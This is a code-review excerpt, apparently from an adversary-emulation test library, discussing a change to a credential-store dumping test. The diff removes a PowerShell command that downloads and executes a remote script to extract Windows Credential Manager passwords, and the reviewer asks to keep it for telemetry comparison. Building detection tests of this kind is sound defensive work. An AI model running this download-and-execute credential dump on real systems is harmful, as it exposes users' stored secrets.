atomics/T1555/T1555.yaml

```diff
@@ -48,4 +48,23 @@ atomic_tests:
     name: powershell
     elevation_required: false
     command: |
-      IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
+      [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]$vault = new-object Windows.Security.Credentials.PasswordVault -ErrorAction silentlycontinue
```

Comment:
when I run the original GetCredmanCreds it returns creds, but when I run the new proposed commands it returns nothing. I believe there may be an issue with the new command. I would prefer to leave the original test in place, and if you get the new one working, to add it as an additional test. Since the telemetry for the two different procedures may be different, I'd like to keep both.

Reply:
Sure no problem, I'll revert that specific commit, the script and the command should have the same telemetry for Web Credentials vault (powershell loading vaultcli.dll), but I'll look further into it if I missed something and why were the outputs different.